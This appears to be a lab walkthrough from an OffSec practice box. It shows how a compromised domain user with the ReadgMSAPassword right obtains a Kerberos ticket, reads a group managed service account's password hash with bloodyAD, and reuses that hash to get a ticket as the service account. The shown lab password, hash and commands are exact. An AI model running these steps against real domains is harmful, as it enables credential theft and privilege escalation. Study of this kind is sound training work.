Heist_OffSec_ReadgMSAPassword

ReadgMSAPassword

---

It has been identified that the compromised domain user, enox, has the ReadgMSAPassword privilege over the svc_apacahe$ account due to its membership to the Web Admins group. This was also enumerated by adPEAS.

The msds-managedpassword attribute is a special LDAP attribute that contains the gMSA password

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/enox@dc01.heist.offsec -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: california
[*] Saving ticket in enox@dc01.heist.offsec.ccache

Validated against the KDC running on the DC host; dc01.heist.offsec(172.16.155.6) TGT generated for the enox user.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ KRB5CCNAME=enox@dc01.heist.offsec.ccache bloodyAD -d HEIST.OFFSEC -k --host dc01.heist.offsec --dc-ip $IP get object 'svc_apache$' --attr msDS-ManagedPassword           
 
distinguishedName: CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc
msDS-ManagedPassword.B64ENCODED: AXmB3EJZCuJRGdjmX6X1ItHNveRYSeSt579nnI8kF6jrkTS5hsR6izvdNFQrXg8Nkg44uvej90PvmB4nAb6mI2DgzlnNkOP/1WzNsRg+Tkvr7zEtxnpFfpQWAB8N6eslDIsLS0JSysaLMX/EGzLZGNmGltwCVXPQXDOI0VeZgoNCjopFZRoVoYlz3kwkcTW6HZu4/g/UpuguUNqm6ekPYp9Oh0EcmWWos8KZv/tK8xprmjGzTt1yfkkEnDFiTfge56HFjLlr42CBoSo07W4SG1dBW+ILFj4D7y3xwQQLZ+HUJsohHyp8nDErMdOt3Focxgs98LZoYjn9YYAvXYk/Mg==

aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc

Validation

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/'svc_apache$'@dc01.heist.offsec -hashes aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Saving ticket in svc_apache$@dc01.heist.offsec.ccache

Validated against the KDC running on the DC host; dc01.heist.offsec(172.16.155.6) TGT generated for the svc_apache$ account.